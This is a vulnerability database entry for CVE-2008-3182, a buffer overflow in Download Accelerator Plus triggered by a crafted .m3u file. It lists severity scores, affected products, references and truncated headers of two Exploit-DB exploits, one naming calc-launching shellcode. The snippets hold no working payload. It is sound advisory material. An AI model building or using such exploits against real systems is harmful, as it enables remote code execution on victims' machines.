CVE-2008-3182
Published 2008-07-15
Priority P344 | critical | 9.3 (CVSS 2.0)
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 7.39% (93.7th percentile)
Stack-based buffer overflow in DAP.exe in Download Accelerator Plus (DAP) 7.0.1.3, 8.6.6.3, and other 8.x versions allows user-assisted remote attackers to execute arbitrary code via an M3U (.m3u) file containing a long MP3 URL.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| speedbit | download_accelerator_plus | — | — |
| speedbit | download_accelerator_plus | — | — |
| speedbit | download_accelerator_plus | — | — |
No detection rules found.
Exploit-DB
Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow
exploitdb·2008-07-11
---
#include
#include
/*
DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English
SecurityFocus Advisory:
Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability
because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute
arbitrary code in the context of the application. Failed exploit attempts
will cause denial-of-service conditions.
Vulnerability discovered by Krystian Kloskowski (h07)
Original POC by h07 http://www.milw0rm.com/exploits/6030
This poc will create a "special" .m3u file that when imported in DAP and then checked with
the verify button will cause a buffer overflow and lead to exploitation. Run the pro
Exploit-DB
Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow
exploitdb·2008-07-08
---
#!/usr/bin/python
# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]
##
from struct import pack
No writeups or analysis indexed.
http://secunia.com/advisories/30997
http://securityreason.com/securityalert/3997
http://www.securityfocus.com/bid/30138
http://www.vupen.com/english/advisories/2008/2027/references
https://exchange.xforce.ibmcloud.com/vulnerabilities/43674
https://www.exploit-db.com/exploits/6030
https://www.exploit-db.com/exploits/6039